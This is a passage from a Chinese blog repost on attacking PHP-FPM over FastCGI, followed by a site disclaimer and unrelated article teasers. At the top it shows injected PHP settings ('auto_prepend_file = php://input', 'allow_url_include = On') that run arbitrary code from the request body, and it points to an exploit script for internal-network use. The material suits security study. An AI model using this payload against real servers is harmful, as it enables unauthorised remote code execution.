'auto_prepend_file = php://input',  # PHP配置:在请求处理之前自动包含php://input中的内容'PHP_ADMIN_VALUE': 'allow_url_include = On'       # PHP管理员配置:允许使用URL包含(远程文件包含)
    }
    
  • 设置auto_prepend_file = php://inputallow_url_include = On,然后将我们需要执行的代码放在Body中,即可执行任意代码。
  • 效果如下:
  • EXP编写

  • 上图中用到的EXP,就是根据之前介绍的fastcgi协议来编写的,代码如下:https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75 。兼容Python2和Python3,方便在内网用。
  • 之前好些人总是拿着一个GO写的工具在用,又不太好用。实际上理解了fastcgi协议,再看看这个源码,就很简单了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/40913.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java实现登录验证 -- JWT令牌实现

目录 1.实现登录验证的引出原因 2.JWT令牌2.1 使用JWT令牌时2.2 令牌的组成 3. JWT令牌&#xff08;token&#xff09;生成和校验3.1 引入JWT令牌的依赖3.2 使用Jar包中提供的API来实现JWT令牌的生成和校验3.3 使用JWT令牌验证登录3.4 令牌的优缺点 1.实现登录验证的引出 传统…

Debezium报错处理系列之第110篇: ERROR Error during binlog processing.Access denied

Debezium报错处理系列之第110篇:ERROR Error during binlog processing. Last offset stored = null, binlog reader near position = /4 Access denied; you need at least one of the REPLICATION SLAVE privilege for this operation 一、完整报错二、错误原因三、解决方法…

微服务: Nacos部署安装与properties配置

Nacos 是阿里巴巴开源的一款用于动态服务发现、配置管理和服务管理的基础设施。Nacos 这个名称源自于 “Dynamic Naming and Configuration Service”。它主要是用于解决微服务架构中服务发现和配置管理的问题。 Nacos 单机模式的部署安装 1. 安装(Windows环境) Nacos是Java…

从入门到深入,Docker新手学习教程

编译整理&#xff5c;TesterHome社区 作者&#xff5c;Ishaan Gupta 以下为作者观点&#xff1a; Docker 彻底改变了我们开发、交付和运行应用程序的方式。它使开发人员能够将应用程序打包到容器中 - 标准化的可执行组件&#xff0c;将应用程序源代码与在任何环境中运行该代码…

InspireFace-商用级的跨平台开源人脸分析SDK

InspireFace-商用级的跨平台开源人脸分析SDK InspireFaceSDK是由insightface开发的⼀款⼈脸识别软件开发⼯具包&#xff08;SDK&#xff09;。它提供了⼀系列功能&#xff0c;可以满⾜各种应⽤场景下的⼈脸识别需求&#xff0c;包括但不限于闸机、⼈脸⻔禁、⼈脸验证等。 该S…

ubuntu22 sshd设置

专栏总目录 一、安装sshd服务 sudo apt updatesudo apt install -y openssh-server 二、配置sshd 使用文本编辑器打开/etc/ssh/sshd_config sudo vi /etc/ssh/sshd_config &#xff08;一&#xff09;配置sshd服务的侦听端口 建议将ssh的侦听端口改为7000以上的端口&#…

【bazel】快速下载教程

bazel下载链接&#xff1a; https://github.com/bazelbuild/bazel/releases?page11 直接在github上下载&#xff0c;会因为网络不稳定&#xff0c;而频繁下载错误 这里提供一个超级快速的方法&#xff01;&#xff01;&#xff01; 用迅雷下载&#xff01; 1.从github上复…

【力扣 - 每日一题】3115. 质数的最大距离(一次遍历、头尾遍历、空间换时间、埃式筛、欧拉筛、打表)Golang实现

原题链接 题目描述 给你一个整数数组 nums。 返回两个&#xff08;不一定不同的&#xff09;质数在 nums 中 下标 的 最大距离。 示例 1&#xff1a; 输入&#xff1a; nums [4,2,9,5,3] 输出&#xff1a; 3 解释&#xff1a; nums[1]、nums[3] 和 nums[4] 是质数。因此答…

算法系列--分治排序|再谈快速排序|快速排序的优化|快速选择算法

前言:本文就前期学习快速排序算法的一些疑惑点进行详细解答,并且给出基础快速排序算法的优化版本 一.再谈快速排序 快速排序算法的核心是分治思想,分治策略分为以下三步: 分解:将原问题分解为若干相似,规模较小的子问题解决:如果子问题规模较小,直接解决;否则递归解决子问题合…

策略模式的应用

前言 系统有一个需求就是采购员审批注册供应商的信息时&#xff0c;会生成一个供应商的账号&#xff0c;此时需要发送供应商的账号信息&#xff08;账号、密码&#xff09;到注册填写的邮箱中&#xff0c;通知供应商账号信息&#xff0c;当时很快就写好了一个工具类&#xff0…

Python 学习中什么是字典,如何操作字典?

什么是字典 字典&#xff08;Dictionary&#xff09;是Python中的一种内置数据结构&#xff0c;用于存储键值对&#xff08;key-value pair&#xff09;。字典的特点是通过键来快速查找值&#xff0c;键必须是唯一的&#xff0c;而值可以是任何数据类型。字典在其他编程语言中…

vue实现搜索文章关键字,滑到指定位置并且高亮

1、输入搜索条件&#xff0c;点击搜索按钮 2、滑到定位到指定的搜索条件。 <template><div><div class"search_form"><el-inputv-model"searchVal"placeholder"请输入关键字查询"clearablesize"small"style&quo…

对于老百姓而言VR到底能做什么?

VR技术自诞生以来不断发展&#xff0c;已经广泛应用于教育、医疗、工程、军事、航空、航海、影视、娱乐等方面&#xff0c;譬如&#xff0c;大型工程或军事活动VR预演可以大幅度减少人力物力投入&#xff1b;在航空领域&#xff0c;航天飞行员在训练舱中面对屏幕进行各种驾驶操…

【Linux进阶】文件系统4——文件系统特性

1.磁盘组成与分区的复习 首先说明一下磁盘的物理组成&#xff0c;整块磁盘的组成主要有&#xff1a; 圆形的碟片&#xff08;主要记录数据的部分&#xff09;&#xff1b;机械手臂&#xff0c;与在机械手臂上的磁头&#xff08;可擦写碟片上的数据);主轴马达&#xff0c;可以…

打开浏览器控制台,点击应用,浏览器崩溃

调试的时候&#xff0c;打开控制台&#xff0c;点击 “应用” 立马浏览器奔溃&#xff0c;但是点击别的没问题 调查发现是因为manifest.json这个文件引起的 manifest.json 最主要的原因是因为没有设置这个sizes字段 Google浏览器更新大概到126之后的版本会有问题&#xff0c;之…

AI多模态教程:Qwen-VL多模态大模型实践指南

一、模型介绍 Qwen-VL&#xff0c;由阿里云研发的大规模视觉语言模型&#xff08;Large Vision Language Model, LVLM&#xff09;&#xff0c;代表了人工智能领域的一个重大突破。该模型具有处理和关联图像、文本、检测框等多种类型数据的能力&#xff0c;其输出形式同样多样…

代码随想录Day69(图论Part05)

并查集 // 1.初始化 int fa[MAXN]; void init(int n) {for (int i1;i<n;i)fa[i]i; }// 2.查询 找到的祖先直接返回&#xff0c;未进行路径压缩 int.find(int i){if(fa[i] i)return i;// 递归出口&#xff0c;当到达了祖先位置&#xff0c;就返回祖先elsereturn find(fa[i])…

基于Python爬虫的城市二手房数据分析可视化

基于Python爬虫的城市二手房数据分析可视化 一、前言二、数据采集(爬虫,附完整代码)三、数据可视化(附完整代码)3.1 房源面积-总价散点图3.2 各行政区均价3.3 均价最高的10个小区3.4 均价最高的10个地段3.5 户型分布3.6 词云图四、如何更换城市一、前言 二手房具有价格普…

CSS position属性之relative和absolute

目录 1 参考文章2 五个属性值3 position:static4 position:relative&#xff08;相对&#xff09;5 position:absolute&#xff08;绝对&#xff09; 1 参考文章 https://blog.csdn.net/lalala_dxf/article/details/123566909 https://blog.csdn.net/WangMinGirl/article/deta…

最灵活且易用的C++开源串口通信调试软件

这款C开源串口调试软件&#xff0c;集成了丰富的功能&#xff0c;为用户提供高效、便捷的串口通信调试体验。以下是其核心功能亮点&#xff1a; 基础功能&#xff1a; 数据交互自如&#xff1a;支持串口数据的轻松读取与发送&#xff0c;让数据交换变得简单直接。 灵活配置参…